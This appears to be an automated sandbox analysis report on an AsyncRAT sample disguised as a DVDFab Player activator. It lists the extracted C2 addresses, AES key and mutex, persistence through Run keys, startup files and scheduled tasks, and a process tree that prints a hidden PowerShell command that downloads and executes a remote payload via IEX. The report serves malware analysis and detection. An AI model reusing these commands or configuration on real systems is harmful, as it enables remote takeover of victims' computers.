Analysis
  max time kernel:  143s
  max time network: 147s
  platform:         windows10_x64
  resource:         win10v20210410
  submitted:        18-04-2021 08:01

  Static task:     static1
  Behavioral task: behavioral1
  Sample:          200CB4B34EA0E61FE8454731BF7A107A.exe
  Resource:        win7v20210408
General
  Target: 200CB4B34EA0E61FE8454731BF7A107A.exe
  Size:   1.9MB
  MD5:    200cb4b34ea0e61fe8454731bf7a107a
  SHA1:   a6121f8f7d8600c2278e90d5ae622c9b2d3b410b
  SHA256: 3deec916d94fabdc65168ebd8b5f072a702781064d13b10700d9a52998a669a3
  SHA512: 62c947626012a18c3a4644ff24909b1c2a3a427b1df4529139eb54bb74da12b5299aca0070d4b0deee168098ea7474207868644e82917bdbf130797f1676fe99
Malware Config

Extracted
  https://www.uplooder.net/f/tl/31/ee790edf8aa2f02c1ffb71003ad4a5c8/defender.mp3

Extracted
  Family:  asyncrat
  Version: 0.5.7B
  C2:      46.1.54.174:87
           46.1.54.174:85
  Mutex:   AsyncMutex_6SI8OkPnk

  aes_key:         R77ian3L214LimJgd0qPoT0OH274e11M
  anti_detection:  false
  autorun:         false
  bdos:            false
  delay:           strings
  host:            46.1.54.174
  hwid:            3
  install_file:
  install_folder:  %AppData%
  mutex:           AsyncMutex_6SI8OkPnk
  pastebin_config: null
  port:            87,85
  version:         0.5.7B
Signatures

Async RAT payload (1 IoCs)
  resource | yara_rule
  behavioral2/memory/3416-194-0x0000014163630000-0x000001416363C000-memory.dmp | asyncrat

Blocklisted process makes network request (2 IoCs)
  flow | pid | process
  11 | 3416 | powershell.exe
  17 | 3416 | powershell.exe

Executes dropped EXE (3 IoCs)
  pid | process
  1268 | Ne - Copy.exe
  1884 | conhost.exe
  4804 | conhost.exe

Drops startup file (5 IoCs)
  description | ioc | process
  File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exe.manifest | Ne - Copy.exe
  File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exe | conhost.exe
  File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exe | conhost.exe
  File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winlogon.vbs | powershell.exe
  File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exe | conhost.exe

Adds Run key to start application (2 TTPs, 4 IoCs)
  description | ioc | process
  Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run | conhost.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\VKRYQ2NT1P = "\"C:\\ProgramData\\conhost.exe\"" | conhost.exe
  Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run | conhost.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\VKRYQ2NT1P = "\"C:\\ProgramData\\conhost.exe\"" | conhost.exe

Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Creates scheduled task(s) (1 TTPs, 2 IoCs)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
  pid | process
  4864 | schtasks.exe
  3736 | schtasks.exe

Modifies registry class (3 IoCs)
  description | ioc | process
  Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings | OpenWith.exe
  Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings | 200CB4B34EA0E61FE8454731BF7A107A.exe
  Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings | OpenWith.exe
Modifies system certificate store
  description | ioc | process
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD | conhost.exe
  Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = <blob value removed> | conhost.exe
  Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = <blob value removed> | conhost.exe
Suspicious behavior: EnumeratesProcesses (6 IoCs)
  pid | process
  3416 | powershell.exe
  1120 | powershell.exe
  1120 | powershell.exe
  3416 | powershell.exe
  1120 | powershell.exe
  3416 | powershell.exe

Suspicious use of AdjustPrivilegeToken (2 IoCs)
  description | pid | process
  Token: SeDebugPrivilege | 1120 | powershell.exe
  Token: SeDebugPrivilege | 3416 | powershell.exe

Suspicious use of FindShellTrayWindow (2 IoCs)
  pid | process
  1268 | Ne - Copy.exe
  1268 | Ne - Copy.exe

Suspicious use of SendNotifyMessage (2 IoCs)
  pid | process
  1268 | Ne - Copy.exe
  1268 | Ne - Copy.exe

Suspicious use of SetWindowsHookEx (2 IoCs)
  pid | process
  2296 | OpenWith.exe
  4180 | OpenWith.exe

Suspicious use of WriteProcessMemory (23 IoCs)
  description | pid | process | target process
  PID 1908 wrote to memory of 64 | 1908 | 200CB4B34EA0E61FE8454731BF7A107A.exe | cmd.exe
  PID 1908 wrote to memory of 64 | 1908 | 200CB4B34EA0E61FE8454731BF7A107A.exe | cmd.exe
  PID 1908 wrote to memory of 1268 | 1908 | 200CB4B34EA0E61FE8454731BF7A107A.exe | Ne - Copy.exe
  PID 1908 wrote to memory of 1268 | 1908 | 200CB4B34EA0E61FE8454731BF7A107A.exe | Ne - Copy.exe
  PID 1908 wrote to memory of 1708 | 1908 | 200CB4B34EA0E61FE8454731BF7A107A.exe | WScript.exe
  PID 1908 wrote to memory of 1708 | 1908 | 200CB4B34EA0E61FE8454731BF7A107A.exe | WScript.exe
  PID 1268 wrote to memory of 1884 | 1268 | Ne - Copy.exe | conhost.exe
  PID 1268 wrote to memory of 1884 | 1268 | Ne - Copy.exe | conhost.exe
  PID 1268 wrote to memory of 1884 | 1268 | Ne - Copy.exe | conhost.exe
  PID 1708 wrote to memory of 1120 | 1708 | WScript.exe | powershell.exe
  PID 1708 wrote to memory of 1120 | 1708 | WScript.exe | powershell.exe
  PID 1884 wrote to memory of 3736 | 1884 | conhost.exe | schtasks.exe
  PID 1884 wrote to memory of 3736 | 1884 | conhost.exe | schtasks.exe
  PID 1708 wrote to memory of 3416 | 1708 | WScript.exe | powershell.exe
  PID 1708 wrote to memory of 3416 | 1708 | WScript.exe | powershell.exe
  PID 64 wrote to memory of 1892 | 64 | cmd.exe | cacls.exe
  PID 64 wrote to memory of 1892 | 64 | cmd.exe | cacls.exe
  PID 64 wrote to memory of 4264 | 64 | cmd.exe | certutil.exe
  PID 64 wrote to memory of 4264 | 64 | cmd.exe | certutil.exe
  PID 64 wrote to memory of 4364 | 64 | cmd.exe | attrib.exe
  PID 64 wrote to memory of 4364 | 64 | cmd.exe | attrib.exe
  PID 4804 wrote to memory of 4864 | 4804 | conhost.exe | schtasks.exe
  PID 4804 wrote to memory of 4864 | 4804 | conhost.exe | schtasks.exe

Views/modifies file attributes (1 TTPs, 1 IoCs)
Processes
(process tree; each child is indented under its parent)

C:\Users\Admin\AppData\Local\Temp\200CB4B34EA0E61FE8454731BF7A107A.exe
  command line: "C:\Users\Admin\AppData\Local\Temp\200CB4B34EA0E61FE8454731BF7A107A.exe"
  - Modifies registry class
  - Suspicious use of WriteProcessMemory

    C:\Windows\system32\cmd.exe
      command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\DVDFabPlayer5Activator.cmd" "
      - Suspicious use of WriteProcessMemory

        C:\Windows\system32\cacls.exe
          command line: "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"

        C:\Windows\system32\certutil.exe
          command line: certutil -decode "C:\Users\Admin\AppData\Roaming\DVDFab Player 5\regRecord\localuse.tmp" "C:\Users\Admin\AppData\Roaming\DVDFab Player 5\regRecord\localuse.rec"

        C:\Windows\system32\attrib.exe
          command line: attrib +r "C:\Users\Admin\AppData\Roaming\DVDFab Player 5\regRecord\localuse.rec"
          - Views/modifies file attributes

    C:\Users\Admin\AppData\Roaming\Ne - Copy.exe
      command line: "C:\Users\Admin\AppData\Roaming\Ne - Copy.exe"
      - Executes dropped EXE
      - Drops startup file
      - Suspicious use of FindShellTrayWindow
      - Suspicious use of SendNotifyMessage
      - Suspicious use of WriteProcessMemory

        C:\ProgramData\conhost.exe
          command line: C:\ProgramData/conhost.exe
          - Executes dropped EXE
          - Drops startup file
          - Adds Run key to start application
          - Modifies system certificate store
          - Suspicious use of WriteProcessMemory

            C:\Windows\System32\schtasks.exe
              command line: "C:\Windows\System32\schtasks.exe" /create /sc minute /mo 1 /tn Skype /tr "C:\ProgramData\conhost.exe
              - Creates scheduled task(s)

    C:\Windows\System32\WScript.exe
      command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\winlogon.vbs"
      - Suspicious use of WriteProcessMemory

        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -Command "[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\winlogon.vbs',[System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Roaming\winlogon.vbs'))"
          - Drops startup file
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken

        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('https://www.uplooder.net/f/tl/31/ee790edf8aa2f02c1ffb71003ad4a5c8/defender.mp3');[System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $stream;[string]$results = $sr.ReadToEnd();IEX $results; wasawasawasawasa
          - Blocklisted process makes network request
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken

C:\Windows\system32\OpenWith.exe
  command line: C:\Windows\system32\OpenWith.exe -Embedding
  - Modifies registry class
  - Suspicious use of SetWindowsHookEx

C:\Windows\system32\OpenWith.exe
  command line: C:\Windows\system32\OpenWith.exe -Embedding
  - Modifies registry class
  - Suspicious use of SetWindowsHookEx

C:\ProgramData\conhost.exe
  command line: C:\ProgramData\conhost.exe
  - Executes dropped EXE
  - Drops startup file
  - Adds Run key to start application
  - Suspicious use of WriteProcessMemory

    C:\Windows\System32\schtasks.exe
      command line: "C:\Windows\System32\schtasks.exe" /create /sc minute /mo 1 /tn Skype /tr "C:\ProgramData\conhost.exe
      - Creates scheduled task(s)
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads

C:\ProgramData\conhost.exe
  MD5    fdbd7b1910d980cf7273796a0119d252
  SHA1   47029af064a51454662909465ce38ee5cdcc62c7
  SHA256 3e1da2d14de49132c42e8a4ddceb5efd36e066523affcc47de6d175316ab0f4e
  SHA512 ab43e5ba29134c62a8beb000657f83b9471a64a839d3462c9625d059b5e259a75cdd27b2536150ae40931478384f6c13ef777756391cbe4cd9d95de35b581170
C:\ProgramData\conhost.exe.manifest
  MD5    dea3d191f1d0f2a5ba924465a46ed502
  SHA1   25fa8deddb7f560e849ed60e0433a638c0cca69c
  SHA256 d628b76063bed997485067b40845ad2f24383d3f2936f94825603748543b1d5f
  SHA512 db300c40c5891a0b4b9e8dee1abc843ac6507f9972a06505f3ed4198513dc4b06541b544312a5cb540615ac3b5db5d033709cdba962f7f28209989aa3b8bebf7

C:\Users\Admin\AppData\Roaming\DVDFab Player 5\regRecord\localuse.rec
  MD5    bea3f19921218df1ac5ba51ef108de85
  SHA1   14b7dc87e78647d3e3d4ed2c6eee3011eba93a68
  SHA256 0f8c6d5f7f0d7bf2b9807b43ab1b3e7a199bc9cb6d9e24768fbd9ffff5119c0c
  SHA512 4b26d86da6a5f46733386d7d8ad6453cae1605d5a781c9befb26a326542d1bd6d321e05b81dcb1caa2ecd17b436c4d5e315f5d98aa69c377a10d7e72220c7c12

C:\Users\Admin\AppData\Roaming\DVDFab Player 5\regRecord\localuse.tmp
  MD5    bdfca84da5ba5c5cf7248cb6f57d73fc
  SHA1   3c09e26230b406c200f18278c41afc6bde42eed5
  SHA256 2952ff5907b110a1ee03dbdd29d50ec69425af025bc6522fedb3bd1fb19ec18a
  SHA512 6faed5b0ce62bd307d6ee73b1e3f23c41ac49cb2428f3a114d68026baff0a77fb7d5eb7c9b9bc7e49ea9746b5cdc7987e7e18f9b1676495acdd1f32df27841ab

C:\Users\Admin\AppData\Roaming\DVDFabPlayer5Activator.cmd
  MD5    f4bf2bbaee1287264fd210715be2e558
  SHA1   ea0efcb5fb67278ddc7ab162a1886bd2c88c04b9
  SHA256 c8be0d55178972ebdcdaf5977193708a00b245c51ba866d1f8944900236862e2
  SHA512 9b789ad964a54031e396daee9ad6325f196482d69d6f69dc8e1b8535a994118ce3d72c8eb405dc0d3442d42971882152f56ec204d1e4bc4b011d6157fd2995cc

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exe
  (these are the hashes of an empty, 0-byte file)
  MD5    d41d8cd98f00b204e9800998ecf8427e
  SHA1   da39a3ee5e6b4b0d3255bfef95601890afd80709
  SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
  SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Roaming\Ne - Copy.exe
  MD5    a4a1fa7769df7c47a6d69fb66aa1eb30
  SHA1   bbcec5f1976ce639eacee23aebce966c3debe111
  SHA256 f08aa6c8b9f5931cfff0e2ecb22c93ea177930d23ec213c1f683ce8467a49cec
  SHA512 54e0f518c87902f3953fa00d0a4dfae655ad13bc50fb02d5777186e3ab09ba4daad67dd5fe09f6db098e1907e95156c3b27ec08f80bdb3fc2ed0cc11a9f7c84b

C:\Users\Admin\AppData\Roaming\winlogon.vbs
  MD5    95433f3a8de55d26ddf7864fe9cde527
  SHA1   2f10dd935c890e89abfc16e9d959ca6163fd8bb6
  SHA256 f63c9b2f961f0242f3d00d453a880df93c944125a57bb82942913a4527e5de49
  SHA512 32fdd2b102f6a3dfe13a9fcb985b62b195b0eb0815959fc4d9ce3817451da2d0b03ecf4d186409694f0b49842e84207e638fc838c90009d39a1cc822451d4334